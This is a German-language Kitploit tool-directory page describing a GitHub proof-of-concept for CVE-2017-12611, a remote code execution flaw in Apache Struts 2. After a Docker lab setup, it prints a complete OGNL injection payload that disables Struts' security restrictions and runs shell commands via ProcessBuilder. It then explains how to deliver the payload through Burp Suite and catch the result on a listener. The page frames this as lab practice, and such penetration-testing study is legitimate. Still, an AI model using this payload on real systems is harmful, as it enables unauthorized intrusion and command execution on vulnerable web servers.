Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-12611_Exploit — RCE-Projekt | Kitploit
Tools/GitHubGitHub/zeynepsilao/cve-2017-12611_exploit
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLabs & Praxis
GitHubzeynepsilao/cve-2017-12611_exploit

CVE-2017-12611_Exploit

RCE-Projekt

Repository anzeigen
3vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-12611-Projekt

Übersicht:

Ein RCE-Angriff ist mit dem angegebenen Payload möglich.

Umgebung & Werkzeuge

Nachfolgend sind die Umgebungen und Werkzeuge für Tests und Validierung in einem isolierten, persönlichen Labor aufgeführt.

  • Host-Betriebssystem: Ubuntu 18.04.6
  • Angreifer-Betriebssystem: Kali Linux
  • Container-Plattform: Docker
  • Zielanwendungs-Stack: Apache Struts 2.3.20.1
  • Zusätzliche Komponenten: Burp Suite

Einrichtung der Umgebung:

Mit dem folgenden Befehl:

root@kitploit:~
docker compose up -d 

können Sie die Umgebung ausführen. Danach sehen Sie eine Übermittlungsseite, wenn Sie http://<YOUR_IP>:8080/hello.action besuchen.

Payload:

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

Tool herunterladen

Um einen RCE-Angriff auszuführen, ist die Verwendung von Burp Suite erforderlich. Übermitteln Sie den Payload, während Sie Burp Suite verwenden. Suchen Sie nach der Übermittlung des Payloads den korrekten Log-Eintrag (POST) und konvertieren Sie ihn in einen curl-Befehl. Öffnen Sie schließlich Ihre Angreifer-Maschine und lauschen Sie auf dem Port, nachdem Sie Ihren curl-Befehl vom Listener-Port gesendet haben.

Hinweise:

Zensierte Bereiche sind IP-Adressen.